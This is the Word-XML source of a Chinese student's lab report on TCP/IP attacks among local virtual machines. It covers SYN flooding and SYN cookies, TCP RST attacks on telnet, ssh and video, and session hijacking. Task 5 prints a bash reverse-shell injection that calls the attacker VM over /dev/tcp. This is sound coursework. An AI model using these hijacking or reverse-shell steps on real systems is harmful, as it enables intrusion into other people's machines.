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720" w:lineRule="auto"/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hint="cs" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>ab</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>4-report</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto"/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>
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto"/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t>TCP/IP Attack Lab</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto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spacing w:line="720" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>ame:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>范心宇</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
        <w:t>tudent Number:57117129</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="44"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="720" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="40"/>
          <w:szCs w:val="4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在本实验中，虚拟机A：10.0.2.5，作为客户端，虚拟机B：10.0.2.6，作为服务器，虚拟机M：10.0.2.4，作为攻击发起者。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/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40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/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t>Task 1: SYN Flooding Attack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eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r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实现TCP协议下的SYN报文泛洪攻击。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eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r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首先测试正常情况下的telnet连接。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用虚拟机A连接虚拟机B：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119880" cy="2054225"/>
            <wp:effectExtent l="0" t="0" r="1016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观察虚拟机B的TCP连接状态：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116070" cy="3017520"/>
            <wp:effectExtent l="0" t="0" r="139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可以看到大部分连接都处于LISTEN状态，与虚拟机A的telnet连接处在ESTABLISHED状态，telnet连接成功。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断开连接后实施SYN泛洪攻击。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首先观察虚拟机B的half-open queue的大小并关闭SYN Rookie保护机制：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114165" cy="520065"/>
            <wp:effectExtent l="0" t="0" r="63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52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在虚拟机M上实施SYN泛洪攻击：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113530" cy="140970"/>
            <wp:effectExtent l="0" t="0" r="127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14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观察wireshark：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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4109085" cy="1945640"/>
            <wp:effectExtent l="0" t="0" r="571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可以看到有大量的源IP地址不同的主机向虚拟机B的telnet服务器端口发送了SYN报文而没有回应的ACK，红色的报文为伪造的IP地址实际存在，其主机向虚拟机B返回的(RST,ACK)报文，通知虚拟机B关闭连接。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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4121785" cy="2544445"/>
            <wp:effectExtent l="0" t="0" r="825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178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再次使用[netstat -tna]查看虚拟机B的TCP连接状态，可以发现有非常多的SYN_RECV状态，说明telnet服务器端口只收到了SYN报文而没有收到ACY，于是处在了half-open的状态。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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4156075" cy="400050"/>
            <wp:effectExtent l="0" t="0" r="444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60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再通过虚拟机A向B发起telnet通信，此时无法连接到服务器，说明B上服务器资源真被占用。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打开SYN Cookie再观察。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打开SYN Cookie：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206875" cy="277495"/>
            <wp:effectExtent l="0" t="0" r="14605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实施攻击：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218305" cy="1907540"/>
            <wp:effectExtent l="0" t="0" r="3175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观察wireshark发现仍有大量SYN报文发送。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220845" cy="2075180"/>
            <wp:effectExtent l="0" t="0" r="635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rcRect b="17386"/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查看虚拟机B的TCP连接状态，发现同样有大量处于SYN_RECV状态的连接。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223385" cy="2138045"/>
            <wp:effectExtent l="0" t="0" r="1333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3385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但此时虚拟机A可以正常快速地连接虚拟机B的telnet服务，这是因为SYN Rookie保护机制生效了。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eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r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SYN洪泛攻击基于服务器开辟给half-open队列的存储空间有限这一缺陷。服务器每次收到SYN报文后ACK报文前会处于SYN_RCV这一半开状态，为了记录谁给自己发送了SYN报文以便在ACK到来后打开正确的连接，服务器开辟出一定空间暂时存储本次连接的TCB信息，该存储空间有限，所以当攻击者无限不间断地发送SYN报文而不对服务器的SYN报文做出回应时，服务器就会存储大量TCB信息直到缓存满不再接收新的连接请求，导致拒绝服务攻击。SYN Rookie则是一项非常有效的防御措施，它取消了服务器对连接TCB信息的暂存，而是通过hash算法对发来的SYN报文进行摘要，摘要信息放在返回的ACK报文sequence字段，这样既能在客户返回的ACK报文中核实hash值是否正确(ack = seq + 1)，又能够对没有返回ACK的主机不予理睬，由于自身没有使用任何存储空间记录信息，所以不会再受到SYN洪泛攻击。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 w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="4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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="4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40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40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/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>2:</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40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/>
          <w:bCs/>
          <w:sz w:val="36"/>
          <w:szCs w:val="40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>TCP RST Attacks on telnet and ssh Connections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textAlignment w:val="auto"/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尝试使用TCP复位攻击破坏telnet和ssh连接。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textAlignment w:val="auto"/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使用Netwox攻击telnet连接。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运行正常情况下的telnet服务：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3775710" cy="2159635"/>
            <wp:effectExtent l="0" t="0" r="381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571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使用Netwox发起攻击：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3776345" cy="255270"/>
            <wp:effectExtent l="0" t="0" r="317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6345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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3788410" cy="269875"/>
            <wp:effectExtent l="0" t="0" r="635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rcRect r="7446" b="932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可以看到虚拟机A上telnet的TCP连接被关闭了。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3784600" cy="772160"/>
            <wp:effectExtent l="0" t="0" r="1016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退出后再尝试连接，可以发现每次尝试连接时都会被关闭，攻击成功。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使用Netwox攻击ssh连接。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运行正常情况下的ssh服务：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3772535" cy="1426845"/>
            <wp:effectExtent l="0" t="0" r="6985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使用Netwox发起攻击：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3778885" cy="904875"/>
            <wp:effectExtent l="0" t="0" r="63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888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可以看到虚拟机A上的ssh连接被关闭了，且想要再次发起连接时请求也会被拒绝，攻击成功。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使用Scapy构造数据包攻击telnet连接。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编写Python程序：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286885" cy="1577340"/>
            <wp:effectExtent l="0" t="0" r="10795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688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运行代码，观察虚拟机A的telnet连接：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3776980" cy="100203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698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可以看到当在虚拟机A上发送信息时，telnet连接自动断开，且断开后想要重连也会再被断开，攻击成功。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使用Scapy构造数据包攻击ssh连接。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稍微修改代码，将过滤器中23号端口改为ssh的22号：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079240" cy="236220"/>
            <wp:effectExtent l="0" t="0" r="508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再次运行代码，观察虚拟机A的ssh连接：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3773805" cy="689610"/>
            <wp:effectExtent l="0" t="0" r="5715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3805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可以看到虚拟机A无法连接虚拟机B的ssh服务，攻击成功。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textAlignment w:val="auto"/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从本实验中可以看到，由于TCP连接设置有RESET重置选项，一旦攻击者可以获取通信双方的IP与port以及seq与ack号，就可以成功伪造TCP RST报文，发送给其中一方就可以有效终止通信，如果编写成自动嗅探与伪造的程序，则可以一直阻止双方的通信。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b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="4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4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40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task 3: TCP RST Attacks on Video Streaming Applications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textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28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对一个网页视频媒体进行TCP复位攻击。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textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28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对虚拟机A实行TCP复位攻击，阻止其视频数据传输。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实施攻击：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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3848100" cy="257810"/>
            <wp:effectExtent l="0" t="0" r="762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可以看到网页的变化：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895090" cy="1906905"/>
            <wp:effectExtent l="0" t="0" r="635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rcRect r="4943" b="2226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textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28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TCP复位攻击对一切基于TCP协议的上层应用都可能造成威胁，攻击者只需要知道通信双方的IP, port, seq以及ack，实施起来也非常方便，只需要将TCP报文RST字段置1。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宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="4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4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40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task 4: TCP Session Hijacking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textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28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实施TCP会话劫持攻击。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textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28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使用Netwox实施攻击。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在虚拟机A上访问虚拟机B的telnet服务，并使用wireshark观察：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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3904615" cy="2063750"/>
            <wp:effectExtent l="0" t="0" r="1206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791585" cy="839470"/>
            <wp:effectExtent l="0" t="0" r="3175" b="139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rcRect t="58151"/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可以看到虚拟机A使用的是60656端口，当前seq为1340960186，ack为3934784411。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使用Netwox进行攻击：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187190" cy="1029335"/>
            <wp:effectExtent l="0" t="0" r="381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rcRect b="63389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171315" cy="1398905"/>
            <wp:effectExtent l="0" t="0" r="444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rcRect l="472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观察虚拟机B：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193540" cy="1290955"/>
            <wp:effectExtent l="0" t="0" r="12700" b="4445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虚拟机B上abc文件并未被删除，但虚拟机A命令行已无法再输入数据，陷入死锁。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使用Scapy构造数据包进行攻击。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编写一个spoof程序：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283710" cy="1901190"/>
            <wp:effectExtent l="0" t="0" r="1397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该程序传递的数据用于删除/home/seed/目录下的abc文件。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执行程序，观察虚拟机A与虚拟机B的情况：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117975" cy="1383665"/>
            <wp:effectExtent l="0" t="0" r="12065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可以看到虚拟机B上的abc文件成功被删除。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123690" cy="156845"/>
            <wp:effectExtent l="0" t="0" r="6350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rcRect l="217" t="9317" r="13711" b="6211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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4123690" cy="245745"/>
            <wp:effectExtent l="0" t="0" r="6350" b="133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rcRect l="1136" t="11475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而在虚拟机A上输入的命令不再能被执行且陷入死锁，等待一段时间后TCP连接自动终止。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textAlignment w:val="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28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2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根据本次实验，可以看到TCP协议存在会话被劫持与注入的风险，攻击者只要获取通信双方的IP, port, seq, ack等基本信息，就可以伪造一方的数据发给另一方，从而在接收方机器中注入自己的数据。但是在执行了TCP会话劫持攻击后，通信双方的TCP连接很可能会出现问题不再可以进行对话，这是因为我们注入的报文打乱了(SEQ, ACK)的逻辑顺序。发送方A将收到接收方B的超前ACK（因为我们的注入增加了数据），由于A收到了B对自己还未发送的数据的ACK，那么它认为这是错误的就丢弃，B却会不断发送该ACK想要收到后面的数据；而接收方B将收到发送方A的滞后SEQ，由于B收到A发来的SEQ是自己已有的数据，那么它认为这是重复的也会丢弃，A却因为没有收到B对该SEQ的ACK而不断重复发送该段数据，于是双方陷入了死锁，TCP连接出现问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4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4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40"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>Task 5: Creating Reverse Shell using TCP Session Hijacking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32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32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利用TCP会话劫持攻击创建逆向shell。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32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32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虚拟机A与虚拟机B建立telnet连接。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这是我们要劫持的TCP会话，攻击者需要将代码注入到作为服务器的虚拟机B的终端。首先先让A与B进行telnet连接：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244975" cy="2391410"/>
            <wp:effectExtent l="0" t="0" r="698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A与B之间成功连接telnet。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打开虚拟机M上的netcat服务。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因为进行逆向shell攻击后，受害者服务器会将标准输入输出都重定向到TCP连接上，所以我们需要先在作为攻击者的虚拟机M上打开一个TCP连接端口，这里使用netcat，可以直接显示输入输出的指令。打开netcat：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274820" cy="365760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实施TCP会话劫持攻击。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修改上一个实验的代码，将注入的数据部分修改为"\n/bin/bash -i 1&gt;/dev/tcp/10.0.2.4/9090 0&lt;&amp;1 2&gt;&amp;1\n"，打开一个bash，并将其标准输入输出以及错误报告重定向到攻击者的TCP连接上，也就是我们上面打开的netcat。执行代码：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518660" cy="16002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</w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4178300" cy="2470150"/>
            <wp:effectExtent l="0" t="0" r="12700" b="139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184650" cy="823595"/>
            <wp:effectExtent l="0" t="0" r="6350" b="146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在虚拟机A上输入足够的字符后不再能够输入与执行，说明触发了攻击。观察虚拟机B的情况：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203065" cy="467995"/>
            <wp:effectExtent l="0" t="0" r="3175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在虚拟机B中输入命令不再被执行，这是因为此时数据的标准输入输出已经不在该bash中，而是被导向了TCP连接，传输到虚拟机M上。再查看此时虚拟机M的情况：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199890" cy="361315"/>
            <wp:effectExtent l="0" t="0" r="635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可以看到多出了一个命令行，我们可以在其中输入命令查看信息。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在命令行中进行测试。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178935" cy="1837690"/>
            <wp:effectExtent l="0" t="0" r="12065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可以看到此时在命令行键入ifconfig查询IP信息，输出的IP地址为10.0.2.6，是受害者虚拟机B的IP地址，说明我们现在进行操作的是虚拟机B的bash界面。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243705" cy="1797685"/>
            <wp:effectExtent l="0" t="0" r="8255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查看bash进程的文件描述符信息，可以看到标准输入输出都被重定向到了socket套接字上，也就是我们netcat服务的TCP连接。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236720" cy="1288415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攻击成功，可以利用该命令行进行进一步的攻击，如可以查看用户密码。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32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32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36"/>
          <w:szCs w:val="40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8"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>利用TCP会话劫持攻击，可以进一步在受害者主机上实现逆向shell，从而从攻击者的主机上就可以控制受害者主机的终端shell，在其中输入命令达到自己想要的结果，非常方便。这一攻击（逆向shell）主要依赖于bash程序可以将输入输出重定向到TCP连接这一功能，重定向到TCP连接也就给本机以外的计算机系统提供了进入本机的渠道，尤其是I/O这种具有影响性的操作，攻击者掌握后可以向主机注入自己想要注入的代码，非常危险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6B69E6B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="96B69E6B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CC3F8FBE"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CC3F8FB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0F4A76B"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="00F4A76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10606EBD"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="10606EB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240BAD00"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="240BAD0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45E6"/>
    <w:rsid w:val="001F45E6"/>
    <w:rsid w:val="002959D3"/>
    <w:rsid w:val="00DF49C8"/>
    <w:rsid w:val="00FE42F8"/>
    <w:rsid w:val="06DC1F98"/>
    <w:rsid w:val="1E6701E0"/>
    <w:rsid w:val="26CA3B64"/>
    <w:rsid w:val="27FA11A3"/>
    <w:rsid w:val="2DCE681D"/>
    <w:rsid w:val="2E6970A0"/>
    <w:rsid w:val="30E93FEB"/>
    <w:rsid w:val="34B16F88"/>
    <w:rsid w:val="3A1135B4"/>
    <w:rsid w:val="3A3A44DB"/>
    <w:rsid w:val="43D53FE6"/>
    <w:rsid w:val="4415490A"/>
    <w:rsid w:val="48D24B9F"/>
    <w:rsid w:val="4AA61367"/>
    <w:rsid w:val="4C2F5F30"/>
    <w:rsid w:val="4E7A502A"/>
    <w:rsid w:val="4F34389A"/>
    <w:rsid w:val="511C1F2C"/>
    <w:rsid w:val="522815B0"/>
    <w:rsid w:val="5358042E"/>
    <w:rsid w:val="59DA553F"/>
    <w:rsid w:val="5F8F3B28"/>
    <w:rsid w:val="5FEF0232"/>
    <w:rsid w:val="649B0DE5"/>
    <w:rsid w:val="6651002B"/>
    <w:rsid w:val="66B87376"/>
    <w:rsid w:val="72A30B31"/>
    <w:rsid w:val="746D5E0D"/>
    <w:rsid w:val="764841B7"/>
    <w:rsid w:val="7B73452D"/>
    <w:rsid w:val="7ED81BDF"/>
    <w:rsid w:val="7F112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10</Words>
  <Characters>58</Characters>
  <Lines>1</Lines>
  <Paragraphs>1</Paragraphs>
  <TotalTime>17</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>67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2020-09-11T13:37:00Z</dcterms:created>
  <dc:creator>心宇 范</dc:creator>
  <cp:lastModifiedBy>公子sx</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2020-09-12T14:04:57Z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